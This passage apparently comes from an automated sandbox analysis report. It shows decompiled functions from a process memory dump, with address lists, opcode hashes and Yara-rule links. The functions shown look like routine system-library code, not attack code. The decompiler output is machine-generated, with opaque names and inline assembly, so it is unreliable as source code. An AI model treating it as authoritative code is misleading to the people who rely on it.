						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0347B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L03454620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E0343CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0347B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0347F380(_t67 + 0xc, 0x3415138, 0x10) == 0) {
								 *0x35260d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E03464F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E03464E70(0x35286b0, 0x3465690, 0, 0) != 0) {
					_t46 = E0343CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                          0x03464d3b
                                                          0x03464d4d
                                                          0x03464d53
                                                          0x03464d58
                                                          0x03464d65
                                                          0x03464d6c
                                                          0x03464d71
                                                          0x03464d77
                                                          0x03464d7f
                                                          0x03464d8c
                                                          0x03464d8e
                                                          0x03464dad
                                                          0x03464db0
                                                          0x03464db7
                                                          0x03464db8
                                                          0x03464db9
                                                          0x03464dba
                                                          0x03464dbb
                                                          0x03464dc1
                                                          0x03464dc8
                                                          0x03464dcc
                                                          0x03464dd5
                                                          0x03464dde
                                                          0x03464ddf
                                                          0x03464de0
                                                          0x03464de1
                                                          0x03464de6
                                                          0x03464de7
                                                          0x03464de9
                                                          0x03464df3
                                                          0x00000000
                                                          0x00000000
                                                          0x034a6c7c
                                                          0x034a6c8a
                                                          0x034a6c8a
                                                          0x034a6c9d
                                                          0x034a6ca7
                                                          0x034a6cac
                                                          0x034a6cb2
                                                          0x034a6cb9
                                                          0x00000000
                                                          0x034a6cbf
                                                          0x034a6cbf
                                                          0x00000000
                                                          0x034a6cbf
                                                          0x034a6cb9
                                                          0x03464dfb
                                                          0x034a6ccf
                                                          0x034a6cd3
                                                          0x03464e32
                                                          0x03464e39
                                                          0x034a6ce0
                                                          0x034a6cf2
                                                          0x034a6cf2
                                                          0x034a6ce0
                                                          0x03464e3f
                                                          0x03464e41
                                                          0x03464e51
                                                          0x03464e51
                                                          0x03464e03
                                                          0x03464e03
                                                          0x03464e09
                                                          0x03464e0f
                                                          0x03464e57
                                                          0x00000000
                                                          0x00000000
                                                          0x03464e1b
                                                          0x03464e30
                                                          0x03464e5b
                                                          0x03464e5b
                                                          0x00000000
                                                          0x03464e30
                                                          0x03464e11
                                                          0x03464e11
                                                          0x03464e16
                                                          0x00000000
                                                          0x03464e16
                                                          0x03464e01
                                                          0x00000000
                                                          0x03464e01
                                                          0x03464da5
                                                          0x034a6c6b
                                                          0x00000000
                                                          0x03464dab
                                                          0x03464dab
                                                          0x00000000
                                                          0x03464dab

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4f6b05079d62f668648f6b6cba03c096c7aaeaec1a349d13569fc3bc531b34e6
                                                          • Instruction ID: c8a6ac2a130f6c0ffb14aafcbd3c42b650f5e6e72a6ffa13162523b377029d20
                                                          • Opcode Fuzzy Hash: 4f6b05079d62f668648f6b6cba03c096c7aaeaec1a349d13569fc3bc531b34e6
                                                          • Instruction Fuzzy Hash: 0E41C075A403189EEF21DF16CC80FABB7A9EB55610F0800ABE9499F381D774DD44CA9A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03448A0A, Relevance: .1, Instructions: 120COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 94%
                                                          			E03448A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x352d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0347B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E0344E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x3411180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E03461DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E03473C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E03448999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                          0x03448a0a
                                                          0x03448a1c
                                                          0x03448a23
                                                          0x03448a2e
                                                          0x03448a30
                                                          0x03448a36
                                                          0x03448a3c
                                                          0x03448a3e
                                                          0x03448a4a
                                                          0x03448a52
                                                          0x03448a9c
                                                          0x03448aae
                                                          0x03448a58
                                                          0x03448a5e
                                                          0x03448a6a
                                                          0x03448a6f
                                                          0x03448a75
                                                          0x03448a7d
                                                          0x03448a85
                                                          0x03448a86
                                                          0x03448a89
                                                          0x03448a93
                                                          0x03448a99
                                                          0x03448a9b
                                                          0x00000000
                                                          0x03448aaf
                                                          0x03448abe
                                                          0x03448ac3
                                                          0x03448acb
                                                          0x03448ad7
                                                          0x03448ae0
                                                          0x03448af1
                                                          0x00000000
                                                          0x03448af1
                                                          0x03448acd
                                                          0x03448ad5
                                                          0x03448afb
                                                          0x03448afd
                                                          0x03448aff
                                                          0x03448b07
                                                          0x03448b22
                                                          0x03448b24
                                                          0x03448b2a
                                                          0x03448b2e
                                                          0x03448b3f
                                                          0x03448b78
                                                          0x03448b41
                                                          0x03448b52
                                                          0x03448b54
                                                          0x03448b5c
                                                          0x03448b74
                                                          0x03448b74
                                                          0x03448b5c
                                                          0x03448b3f
                                                          0x03448b5e
                                                          0x03448b61
                                                          0x03448b64
                                                          0x03448b64
                                                          0x03448b6c
                                                          0x03448b6c
                                                          0x03448b11
                                                          0x03499cd5
                                                          0x03499cd5
                                                          0x03448b17
                                                          0x03448b1a
                                                          0x03448b1a
                                                          0x00000000
                                                          0x03448ad5
                                                          0x03448a89

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b5c728dce590b8605a367e0f5da128e4bcc5546671cac777db1cb1d1377dbda9
                                                          • Instruction ID: 6ae244a764268d5ec24ba3bb413fa36ed2ceb6572dcfb0d411fd10013a64c2f3
                                                          • Opcode Fuzzy Hash: b5c728dce590b8605a367e0f5da128e4bcc5546671cac777db1cb1d1377dbda9
                                                          • Instruction Fuzzy Hash: A74163B4A003289FEB24DF55CC88AAAB7F8EB44300F1445EBE919AB351D7719E80CF54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034B69A6, Relevance: .1, Instructions: 108COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 69%
                                                          			E034B69A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x352d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L03446C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E034B6BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E03479980() >= 0) {
							E03452280(_t56, 0x3528778);
							_t77 = 1;
							_t68 = 1;
							if( *0x3528774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x3528774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E0343B6F0(0x341c338, 0x341c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E03479520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E034795D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E0344FFB0(_t68, _t77, 0x3528778);
				}
				_pop(_t78);
				return E0347B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                          0x034b69b5
                                                          0x034b69be
                                                          0x034b69c3
                                                          0x034b69c9
                                                          0x034b69cc
                                                          0x034b69d1
                                                          0x034b69d3
                                                          0x034b69de
                                                          0x034b69e1
                                                          0x034b69ea
                                                          0x034b69f6
                                                          0x034b69fe
                                                          0x034b6a13
                                                          0x034b6a14
                                                          0x034b6a15
                                                          0x034b6a16
                                                          0x034b6a1e
                                                          0x034b6a26
                                                          0x034b6a31
                                                          0x034b6a36
                                                          0x034b6a37
                                                          0x034b6a40
                                                          0x034b6a49
                                                          0x034b6a4a
                                                          0x034b6a53
                                                          0x034b6a59
                                                          0x034b6a5d
                                                          0x034b6a5e
                                                          0x034b6a64
                                                          0x034b6a67
                                                          0x034b6a6a
                                                          0x034b6a6d
                                                          0x034b6a70
                                                          0x034b6a77
                                                          0x034b6a7d
                                                          0x034b6a86
                                                          0x034b6a89
                                                          0x034b6a9c
                                                          0x034b6a9f
                                                          0x034b6aa2
                                                          0x034b6aa5
                                                          0x034b6aaf
                                                          0x034b6ab1
                                                          0x034b6ab8
                                                          0x034b6ab9
                                                          0x034b6abb
                                                          0x034b6abe
                                                          0x034b6ac5
                                                          0x034b6ac5
                                                          0x034b6aaf
                                                          0x034b6a40
                                                          0x034b6a26
                                                          0x034b69fe
                                                          0x034b6ace
                                                          0x034b6ad0
                                                          0x034b6ad3
                                                          0x034b6ad8
                                                          0x034b6adf
                                                          0x034b6adf
                                                          0x034b6ae8
                                                          0x034b6aef
                                                          0x034b6aef
                                                          0x034b6af9
                                                          0x034b6b06

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 11f590383b720e830fba00fe172f48515f76e3260a44d6a25a969c0dcdf1ef51
                                                          • Instruction ID: 51af7a5af3a2ccf9fd963d9d12d1b491fe8ac1ff356601c5c387454bbaf038cf
                                                          • Opcode Fuzzy Hash: 11f590383b720e830fba00fe172f48515f76e3260a44d6a25a969c0dcdf1ef51
                                                          • Instruction Fuzzy Hash: B24189B1E00718AFDB20DFA5D940BFEBBF8EF49704F18812AE814AB250DB749905CB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0346A61C, Relevance: .1, Instructions: 106COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 78%
                                                          			E0346A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x3510220);
				E0348D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x3527b9c; // 0x0
				_t55 = L03454620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0348D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x3527b10 =  *0x3527b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x352536c; // 0x2fd30d0
					if( *_t51 != 0x3525368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x3525368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x352536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0346A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                                          0x0346a61c
                                                          0x0346a61e
                                                          0x0346a623
                                                          0x0346a628
                                                          0x0346a62b
                                                          0x0346a62d
                                                          0x0346a648
                                                          0x0346a64a
                                                          0x0346a64f
                                                          0x034a9b44
                                                          0x0346a6ec
                                                          0x0346a6f1
                                                          0x0346a6f1
                                                          0x0346a655
                                                          0x0346a657
                                                          0x0346a65a
                                                          0x0346a65d
                                                          0x0346a662
                                                          0x0346a663
                                                          0x0346a667
                                                          0x0346a668
                                                          0x0346a66d
                                                          0x0346a706
                                                          0x0346a706
                                                          0x034a9bda
                                                          0x034a9be6
                                                          0x034a9beb
                                                          0x00000000
                                                          0x034a9beb
                                                          0x0346a679
                                                          0x034a9b7a
                                                          0x00000000
                                                          0x034a9b7a
                                                          0x0346a683
                                                          0x0346a6f4
                                                          0x0346a6f7
                                                          0x0346a6f9
                                                          0x0346a6fd
                                                          0x0346a6a0
                                                          0x0346a6a0
                                                          0x0346a6ad
                                                          0x0346a6af
                                                          0x0346a6b4
                                                          0x034a9ba7
                                                          0x034a9bac
                                                          0x00000000
                                                          0x00000000
                                                          0x034a9bc6
                                                          0x034a9bce
                                                          0x034a9bd1
                                                          0x034a9bd3
                                                          0x034a9bd3
                                                          0x00000000
                                                          0x034a9bd1
                                                          0x0346a6bd
                                                          0x0346a6c3
                                                          0x0346a6c6
                                                          0x0346a6d2
                                                          0x0346a701
                                                          0x0346a704
                                                          0x00000000
                                                          0x0346a704
                                                          0x0346a6d4
                                                          0x0346a6d6
                                                          0x0346a6d9
                                                          0x0346a6db
                                                          0x0346a6e1
                                                          0x0346a6e6
                                                          0x0346a6e8
                                                          0x0346a6e8
                                                          0x0346a6ea
                                                          0x00000000
                                                          0x0346a6ea
                                                          0x0346a688
                                                          0x0346a692
                                                          0x0346a694
                                                          0x0346a699
                                                          0x00000000
                                                          0x00000000
                                                          0x0346a69d
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2f645d41a6f47a8359b9cae06f0997f4d188bab53e69f62b12f6b9de8fed7490
                                                          • Instruction ID: 8d45ed68e9e2a7614e4b18f74aa1bcd630575425f1e31ba8c55451ef7ff1f52d
                                                          • Opcode Fuzzy Hash: 2f645d41a6f47a8359b9cae06f0997f4d188bab53e69f62b12f6b9de8fed7490
                                                          • Instruction Fuzzy Hash: 8D418AB5A01609DFCB14DF58C880B9DBBF1BB5A304F1880AAE815AF355D774A942CF58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03473D43, Relevance: .1, Instructions: 106COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E03473D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E03447B60(0, _t61, 0x34111c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E03447B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L03454620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                          0x03473d4c
                                                          0x03473d50
                                                          0x03473d55
                                                          0x03473d5e
                                                          0x034ae79a
                                                          0x00000000
                                                          0x034ae79a
                                                          0x03473d68
                                                          0x034ae789
                                                          0x03473d9d
                                                          0x03473da3
                                                          0x03473daf
                                                          0x03473db5
                                                          0x03473dbc
                                                          0x03473dc4
                                                          0x03473dc9
                                                          0x03473dce
                                                          0x034ae7ae
                                                          0x034ae7ae
                                                          0x03473dde
                                                          0x03473de2
                                                          0x03473de7
                                                          0x03473e0d
                                                          0x03473e13
                                                          0x03473e16
                                                          0x03473e1e
                                                          0x03473e25
                                                          0x03473e28
                                                          0x00000000
                                                          0x00000000
                                                          0x03473e2a
                                                          0x03473e2f
                                                          0x03473e37
                                                          0x03473e37
                                                          0x00000000
                                                          0x03473e37
                                                          0x03473e31
                                                          0x00000000
                                                          0x03473e31
                                                          0x03473e20
                                                          0x03473e20
                                                          0x03473e35
                                                          0x00000000
                                                          0x03473de9
                                                          0x03473de9
                                                          0x03473de9
                                                          0x03473dee
                                                          0x03473dfd
                                                          0x03473dff
                                                          0x03473e02
                                                          0x03473e05
                                                          0x03473e05
                                                          0x00000000
                                                          0x03473df0
                                                          0x03473de7
                                                          0x034ae78f
                                                          0x034ae794
                                                          0x03473d79
                                                          0x03473d84
                                                          0x03473d89
                                                          0x03473d8e
                                                          0x00000000
                                                          0x034ae7a4
                                                          0x03473d96
                                                          0x03473d9a
                                                          0x00000000
                                                          0x03473d9a
                                                          0x00000000
                                                          0x034ae794
                                                          0x03473d6e
                                                          0x03473d73
                                                          0x00000000
                                                          0x034ae7b5
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ff40793ded80df089d839d5cc8595a7d2f746665e6b2e22ce236eb08f4c554dd
                                                          • Instruction ID: 93f7a8bfab0c24743624d99682fa2c63b188e5fd2473615ce7a3be45f35abdd1
                                                          • Opcode Fuzzy Hash: ff40793ded80df089d839d5cc8595a7d2f746665e6b2e22ce236eb08f4c554dd
                                                          • Instruction Fuzzy Hash: 3131AF39A056159BC724CF2EC441AABBBA5EF55700B09806FE869CF350E730D881E7D9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0345C182, Relevance: .1, Instructions: 104COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 68%
                                                          			E0345C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E03457D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E03508D34(_v8, _t80);
					}
					E03452280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E0344FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E03508833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E0344FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0347B180();
						if(_a4 != 0) {
							E03452280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0345BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0345BB2D(_t16, _t15);
						E0345B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E0344FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E0344FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E0344FFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                          0x0345c18d
                                                          0x0345c18f
                                                          0x0345c191
                                                          0x0345c19b
                                                          0x0345c1a0
                                                          0x0345c1d4
                                                          0x0345c1de
                                                          0x034a2d6e
                                                          0x0345c1e4
                                                          0x0345c1e4
                                                          0x0345c1e4
                                                          0x0345c1ec
                                                          0x034a2d7d
                                                          0x034a2d7d
                                                          0x0345c1f3
                                                          0x0345c1ff
                                                          0x034a2d88
                                                          0x034a2d8d
                                                          0x034a2d94
                                                          0x034a2d94
                                                          0x034a2d9f
                                                          0x034a2da4
                                                          0x034a2dab
                                                          0x034a2db0
                                                          0x034a2db2
                                                          0x034a2db3
                                                          0x034a2db4
                                                          0x034a2dbc
                                                          0x034a2dc3
                                                          0x034a2dc3
                                                          0x0345c205
                                                          0x0345c205
                                                          0x0345c208
                                                          0x0345c20e
